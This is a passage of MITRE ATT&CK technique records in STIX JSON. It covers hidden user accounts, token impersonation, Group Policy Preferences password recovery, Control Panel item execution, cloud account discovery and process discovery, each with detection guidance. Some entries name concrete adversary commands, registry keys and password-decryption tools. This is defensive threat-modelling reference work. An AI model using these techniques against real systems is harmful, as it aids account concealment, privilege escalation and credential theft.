inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Integrity"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", "created": "2020-02-20T14:31:34.778Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1491/001", "external_id": "T1491.001"}, {"source_name": "Novetta Blockbuster Destructive Malware", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", "url": "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf"}, {"source_name": "Novetta Blockbuster", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Hidden Users", "description": "Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. \n\nIn macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value Hide500Users to TRUE in the /Library/Preferences/com.apple.loginwindow plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the Hide500Users key value is set to TRUE, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the dscl utility to create hidden user accounts by setting the IsHidden attribute to 1. Adversaries can also hide a user\u2019s home folder by changing the chflags to hidden.(Citation: Apple Support Hide a User Account) \n\nAdversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)\n\nOn Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the gsettings command (ex: sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Omkar Gudhate"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for users that may be hidden from the login screen but still present in additional artifacts of usage such as directories and authentication logs. \n\nMonitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList key.\n\nIn macOS, monitor for commands, processes, and file activity in combination with a user that has a userID under 500.(Citation: Cybereason OSX Pirrit) Monitor for modifications to set the Hide500Users key value to TRUE in the /Library/Preferences/com.apple.loginwindow plist file. Monitor the command line for usage of the dscl . create command with the IsHidden attribute set to 1.(Citation: Apple Support Hide a User Account) ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "created": "2020-03-13T20:12:40.876Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/002", "external_id": "T1564.002"}, {"source_name": "Cybereason OSX Pirrit", "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.", "url": "https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"}, {"source_name": "Apple Support Hide a User Account", "description": "Apple. (2020, November 30). Hide a user account in macOS. Retrieved December 10, 2021.", "url": "https://support.apple.com/en-us/HT203998"}, {"source_name": "FireEye SMOKEDHAM June 2021", "description": "FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate\u2019s Supply Chain Software Compromise. Retrieved September 22, 2021.", "url": "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html"}, {"source_name": "Hide GDM User Accounts", "description": "Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.", "url": "https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/"}, {"source_name": "US-CERT TA18-074A", "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-01-10T17:55:46.905Z", "name": "Make and Impersonate Token", "description": "Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.\n\nThis behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Jonny Johnson"], "x_mitre_deprecated": false, "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Windows User Account Control", "System access controls", "File system access controls"], "x_mitre_effective_permissions": ["SYSTEM"], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", "created": "2020-02-18T18:03:37.481Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1134/003", "external_id": "T1134.003"}, {"source_name": "Microsoft Command-line Logging", "description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.", "url": "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing"}, {"source_name": "LogonUserW function", "description": "Microsoft. (2023, March 10). LogonUserW function (winbase.h). Retrieved January 8, 2024.", "url": "https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:07.840Z", "name": "External Remote Services", "description": "Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire)\n\nExternal remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. \n\nAs they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow", "Logon Session: Logon Session Metadata", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0822", "external_id": "T0822"}, {"source_name": "Daniel Oakley, Travis Smith, Tripwire", "description": "Daniel Oakley, Travis Smith, Tripwire Retrieved. 2018/05/30 ", "url": "https://attack.mitre.org/wiki/Technique/T1133"}, {"source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Group Policy Preferences", "description": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)\n\nThese group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit\u2019s post exploitation module: post/windows/gather/credentials/gpp\n* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nOn the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "created": "2020-02-11T18:43:06.253Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1552/006", "external_id": "T1552.006"}, {"source_name": "Microsoft GPP 2016", "description": "Microsoft. (2016, August 31). Group Policy Preferences. Retrieved March 9, 2020.", "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)"}, {"source_name": "Microsoft GPP Key", "description": "Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April 11, 2018.", "url": "https://msdn.microsoft.com/library/cc422924.aspx"}, {"source_name": "Obscuresecurity Get-GPPPassword", "description": "Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell. Retrieved April 11, 2018.", "url": "https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html"}, {"source_name": "ADSecurity Finding Passwords in SYSVOL", "description": "Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL & Exploiting Group Policy Preferences. Retrieved February 17, 2020.", "url": "https://adsecurity.org/?p=2288"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Control Panel Items", "description": "Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)\n\nFor ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)\n\nAdversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the Windows Control Panel process binary (control.exe) and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1085) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1085) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}). (Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Application whitelisting", "Process whitelisting"], "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8df54627-376c-487c-a09c-7d2b5620f56e", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1196", "external_id": "T1196"}, {"source_name": "Microsoft Implementing CPL", "description": "M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.", "url": "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx"}, {"source_name": "TrendMicro CPL Malware Jan 2014", "description": "Merc\u00eas, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.", "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"}, {"source_name": "TrendMicro CPL Malware Dec 2013", "description": "Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/"}, {"source_name": "Palo Alto Reaver Nov 2017", "description": "Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol", "description": "Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAsymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. \n\nNetwork protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["William Cain"], "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", "created": "2020-03-15T15:34:30.767Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1048/002", "external_id": "T1048.002"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:08.037Z", "name": "Brute Force I/O", "description": "Adversaries may repetitively or successively change I/O point values to perform an action. Brute Force I/O may be achieved by changing either a range of I/O point values or a single point value repeatedly to manipulate a process function. The adversary's goal and the information they have about the target environment will influence which of the options they choose. In the case of brute forcing a range of point values, the adversary may be able to achieve an impact without targeting a specific point. In the case where a single point is targeted, the adversary may be able to generate instability on the process function associated with that particular point. \n\nAdversaries may use Brute Force I/O to cause failures within various industrial processes. These failures could be the result of wear on equipment or damage to downstream equipment.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impair-process-control"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Operational Databases: Process History/Live Data", "Application Log: Application Log Content", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0806", "external_id": "T0806"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Cloud Account", "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_detection": "Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Azure AD", "Office 365", "SaaS", "IaaS", "Google Workspace"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", "created": "2020-02-21T21:08:36.570Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1087/004", "external_id": "T1087.004"}, {"source_name": "Microsoft msolrolemember", "description": "Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.", "url": "https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0"}, {"source_name": "GitHub Raindance", "description": "Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.", "url": "https://github.com/True-Demon/raindance"}, {"source_name": "Microsoft AZ CLI", "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.", "url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest"}, {"source_name": "Black Hills Red Teaming MS AD Azure, 2018", "description": "Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.", "url": "https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/"}, {"source_name": "AWS List Roles", "description": "Amazon. (n.d.). List Roles. Retrieved August 11, 2020.", "url": "https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html"}, {"source_name": "AWS List Users", "description": "Amazon. (n.d.). List Users. Retrieved August 11, 2020.", "url": "https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html"}, {"source_name": "Google Cloud - IAM Servie Accounts List API", "description": "Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.", "url": "https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T12:43:55.369Z", "name": "Process Discovery", "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via `/proc`. \n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nFor network infrastructure devices, collect AAA logging to monitor for `show` commands being run by non-standard users from non-standard locations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "created": "2017-05-31T21:30:48.728Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1057", "external_id": "T1057"}, {"source_name": "show_processes_cisco_cmd", "description": "Cisco. (2022, August 16). show processes - . Retrieved July 13, 2022.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Impair Command History Logging", "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is 